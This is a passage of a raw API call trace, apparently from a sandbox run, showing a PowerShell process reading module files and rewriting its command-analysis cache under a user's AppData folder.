0x1e35144bfb0 [0169.181] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144bfb0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0169.181] CoTaskMemFree (pv=0x1e35144bfb0) [0169.181] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f8a8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0169.181] GetCurrentProcess () returned 0xffffffffffffffff [0169.181] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8ad58 | out: TokenHandle=0xb156f8ad58*=0x798) returned 1 [0169.181] GetTokenInformation (in: TokenHandle=0x798, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8ae58 | out: TokenInformation=0x0, ReturnLength=0xb156f8ae58) returned 0 [0169.181] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d6850 [0169.181] GetTokenInformation (in: TokenHandle=0x798, TokenInformationClass=0x1, TokenInformation=0x1e3513d6850, TokenInformationLength=0x2c, ReturnLength=0xb156f8ae58 | out: TokenInformation=0x1e3513d6850, ReturnLength=0xb156f8ae58) returned 1 [0169.182] LocalFree (hMem=0x1e3513d6850) returned 0x0 [0169.182] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e339bb87b8, cbSid=0xb156f8ae50 | out: pSid=0x1e339bb87b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8ae50) returned 1 [0169.183] CreateMutexW (lpMutexAttributes=0x1e339bb8908, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x738 [0169.183] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8acf0*=0x738, lpdwindex=0xb156f8aac4 | out: lpdwindex=0xb156f8aac4) returned 0x0 [0169.183] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144e5f0 [0169.183] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144e5f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0169.183] CoTaskMemFree (pv=0x1e35144e5f0) [0169.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0xb156f8a9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0169.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0xb156f8a810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0169.286] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1")) returned 0x20 [0169.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0xb156f89fd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c [0169.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a4b0) returned 1 [0169.288] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x86c [0169.288] GetFileType (hFile=0x86c) returned 0x1 [0169.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a420) returned 1 [0169.288] GetFileType (hFile=0x86c) returned 0x1 [0169.289] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.293] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.293] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.293] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.294] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.294] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.294] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.294] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.295] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.295] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.295] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.296] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x1000, lpOverlapped=0x0) returned 1 [0169.297] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0xb3c, lpOverlapped=0x0) returned 1 [0169.297] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c506a4, nNumberOfBytesToRead=0xc4, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c506a4*, lpNumberOfBytesRead=0xb156f8a588*=0x0, lpOverlapped=0x0) returned 1 [0169.297] ReadFile (in: hFile=0x86c, lpBuffer=0x1e339c51028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a588, lpOverlapped=0x0 | out: lpBuffer=0x1e339c51028*, lpNumberOfBytesRead=0xb156f8a588*=0x0, lpOverlapped=0x0) returned 1 [0169.298] CloseHandle (hObject=0x86c) returned 1 [0169.453] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144ec50 [0169.454] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144ec50 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0169.454] CoTaskMemFree (pv=0x1e35144ec50) [0169.454] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f89fe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0169.454] GetCurrentProcess () returned 0xffffffffffffffff [0169.454] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8a528 | out: TokenHandle=0xb156f8a528*=0x730) returned 1 [0169.454] GetTokenInformation (in: TokenHandle=0x730, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8a628 | out: TokenInformation=0x0, ReturnLength=0xb156f8a628) returned 0 [0169.454] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1e3513d6ad0 [0169.455] GetTokenInformation (in: TokenHandle=0x730, TokenInformationClass=0x1, TokenInformation=0x1e3513d6ad0, TokenInformationLength=0x2c, ReturnLength=0xb156f8a628 | out: TokenInformation=0x1e3513d6ad0, ReturnLength=0xb156f8a628) returned 1 [0169.456] LocalFree (hMem=0x1e3513d6ad0) returned 0x0 [0169.456] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1e339592ac0, cbSid=0xb156f8a620 | out: pSid=0x1e339592ac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xb156f8a620) returned 1 [0169.456] CreateMutexW (lpMutexAttributes=0x1e339592c10, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x45c [0169.456] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8a4c0*=0x45c, lpdwindex=0xb156f8a294 | out: lpdwindex=0xb156f8a294) returned 0x0 [0169.458] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144db50 [0169.458] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144db50, nSize=0x105 | out: lpBuffer="") returned 0x0 [0169.458] CoTaskMemFree (pv=0x1e35144db50) [0169.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0xb156f8a0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c [0169.458] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a550) returned 1 [0169.458] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1e339599ee8 | out: lpFileInformation=0x1e339599ee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c)) returned 1 [0169.458] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a510) returned 1 [0169.459] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f89f80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0169.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a3d0) returned 1 [0169.459] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8a4b0 | out: lpFileInformation=0xb156f8a4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0169.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a390) returned 1 [0169.460] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f89e30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0169.460] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a310) returned 1 [0169.460] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x458 [0169.460] GetFileType (hFile=0x458) returned 0x1 [0169.460] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a280) returned 1 [0169.460] GetFileType (hFile=0x458) returned 0x1 [0169.460] ReadFile (in: hFile=0x458, lpBuffer=0x1e33959b558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8a178, lpOverlapped=0x0 | out: lpBuffer=0x1e33959b558*, lpNumberOfBytesRead=0xb156f8a178*=0x1000, lpOverlapped=0x0) returned 1 [0169.464] ReadFile (in: hFile=0x458, lpBuffer=0x1e33959d32b, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f89e18, lpOverlapped=0x0 | out: lpBuffer=0x1e33959d32b*, lpNumberOfBytesRead=0xb156f89e18*=0x28, lpOverlapped=0x0) returned 1 [0169.464] ReadFile (in: hFile=0x458, lpBuffer=0x1e33959b558, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f89de8, lpOverlapped=0x0 | out: lpBuffer=0x1e33959b558*, lpNumberOfBytesRead=0xb156f89de8*=0x1000, lpOverlapped=0x0) returned 1 [0169.469] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144b730 [0169.469] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144b730 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0169.469] CoTaskMemFree (pv=0x1e35144b730) [0169.469] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f89e70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0169.469] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8a000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0169.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a450) returned 1 [0169.469] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8a530 | out: lpFileInformation=0xb156f8a530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0169.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a410) returned 1 [0169.469] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215", nBufferLength=0x105, lpBuffer=0xb156f89eb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215", lpFilePart=0x0) returned 0x93 [0169.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a390) returned 1 [0169.469] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6de40067-cd2a-4666-8cd9-870e0a588215" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_6de40067-cd2a-4666-8cd9-870e0a588215"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x458 [0169.470] GetFileType (hFile=0x458) returned 0x1 [0169.470] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a300) returned 1 [0169.470] GetFileType (hFile=0x458) returned 0x1 [0169.471] SetEndOfFile (hFile=0x458) returned 1 [0170.179] WriteFile (in: hFile=0x458, lpBuffer=0x1e3395c73d8*, nNumberOfBytesToWrite=0x662, lpNumberOfBytesWritten=0xb156f8a498, lpOverlapped=0x0 | out: lpBuffer=0x1e3395c73d8*, lpNumberOfBytesWritten=0xb156f8a498*=0x662, lpOverlapped=0x0) returned 1 [0170.187] CloseHandle (hObject=0x458) returned 1 [0170.191] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144d4f0 [0170.191] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1e35144d4f0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0170.192] CoTaskMemFree (pv=0x1e35144d4f0) [0170.192] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xb156f89e10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0170.192] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f89fa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0170.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a3f0) returned 1 [0170.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8a4d0 | out: lpFileInformation=0xb156f8a4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0170.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a3b0) returned 1 [0170.193] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0xb156f89e50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0170.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8a330) returned 1 [0170.193] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x458 [0170.193] GetFileType (hFile=0x458) returned 0x1 [0170.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8a2a0) returned 1 [0170.193] GetFileType (hFile=0x458) returned 0x1 [0170.193] SetEndOfFile (hFile=0x458) returned 1 [0170.715] WriteFile (in: hFile=0x458, lpBuffer=0x1e3395ec568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f89b78, lpOverlapped=0x0 | out: lpBuffer=0x1e3395ec568*, lpNumberOfBytesWritten=0xb156f89b78*=0x1000, lpOverlapped=0x0) returned 1 [0170.719] WriteFile (in: hFile=0x458, lpBuffer=0x1e3395ec568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f89d48, lpOverlapped=0x0 | out: lpBuffer=0x1e3395ec568*, lpNumberOfBytesWritten=0xb156f89d48*=0x1000, lpOverlapped=0x0) returned 1 [0170.720] WriteFile (in: hFile=0x458, lpBuffer=0x1e3395ec568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f89d48, lpOverlapped=0x0 | out: lpBuffer=0x1e3395ec568*, lpNumberOfBytesWritten=0xb156f89d48*=0x1000, lpOverlapped=0x0) returned 1 [0170.723] WriteFile (in: hFile=0x458, lpBuffer=0x1e3395ec568*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f89b78, lpOverlapped=0x0 | out: lpBuffer=0x1e3395ec568*, lpNumberOfBytesWritten=0xb156f89b78*=0x1000, lpOverlapped=0x0) returned 1 [0170.724] WriteFile (in: hFile=0x458, lpBuffer=0x1e3395ec568*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0xb156f8a438, lpOverlapped=0x0 | out: lpBuffer=0x1e3395ec568*, lpNumberOfBytesWritten=0xb156f8a438*=0xdda, lpOverlapped=0x0) returned 1 [0170.725] CloseHandle (hObject=0x458) returned 1 [0170.728] ReleaseMutex (hMutex=0x45c) returned 1 [0170.748] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144dd70 [0170.748] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e35144dd70, nSize=0x105 | out: lpBuffer="") returned 0x97 [0170.749] CoTaskMemFree (pv=0x1e35144dd70) [0170.749] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0170.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ac80) returned 1 [0170.750] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad60 | out: lpFileInformation=0xb156f8ad60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0170.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ac40) returned 1 [0170.756] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0170.783] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8a830, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0170.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ac80) returned 1 [0170.783] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8ad60 | out: lpFileInformation=0xb156f8ad60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, 